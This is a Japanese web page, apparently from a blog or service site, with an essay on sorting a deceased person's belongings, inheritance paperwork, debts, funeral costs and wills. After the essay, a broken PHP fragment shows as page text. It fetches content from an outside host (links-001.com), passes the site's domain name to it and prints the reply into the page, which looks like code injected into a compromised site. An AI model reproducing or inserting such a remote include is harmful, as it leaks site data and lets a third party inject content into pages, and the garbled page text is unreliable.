前へ
次へ

遺品整理という捉え方

遺品整理が必要になるのは、人の死に直面した後、葬儀などが執り行われた後になります。
形見分けも必要になるでしょうし、遺品整理が必要となるのは、賃貸住まいであれ、持ち家であれ、その住まいに1人で暮らしていた方の場合には必要不可欠なことです。
全てを家族に任せるか、業者に任せるか、それは費用の問題や整理が必要となるモノの量の問題、それぞれの都合もあります。
残された者たちが満足できるのは、遺品の中でも相続が必要となる書類や通帳など、プラス財産となるものを探し出すことも一理あるでしょう。
もちろん、マイナスとなる財産、いわゆる借金を抱えていたまま天国に旅立つ人もいます。
その場合には、もしかすれば、遺族がその残金を支払うことになるかもしれませんから、一度は郵便物などをしっかりチェックしておきましょう。
もちろん、大切な人の死を受け入れるまでには時間もかかりますが、仮住まいならば、その住まいの引き渡しをしなければなりません。
終活では、どこに何を保管しているか、誰に何を渡すのか、誰に知らせるべきなのか、任せることのできる遺族あるいは弁護士などへ意思を伝えておくのがおすすめです。
もちろん、遺言書を作成しておくのがベストな選択なのは言うまでもなく、気心知れた誰かに相談しておきましょう。
遺品整理と一口にいっても、遺産(遺品)の中から葬儀費用を払うケースも少なからずあります。
生命保険をあてるケースもありますが、葬儀費用をどのくらいかけるか、という現実問題もしっかり念頭に入れて、葬儀を執り行う必要もあるようです。
遺品の捉え方も人それぞれ、墓や仏壇など、意外に高価な素材を使っているモノの管理も含めて、誰が相続するのかを考えなければなりません。
整理するというよりも、処理するという流れ作業になりがちです。
大切な人の形見、それが装飾品やコレクションしていた骨董品であれ、全てを遺族が平等に分けることなど、難しいものです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top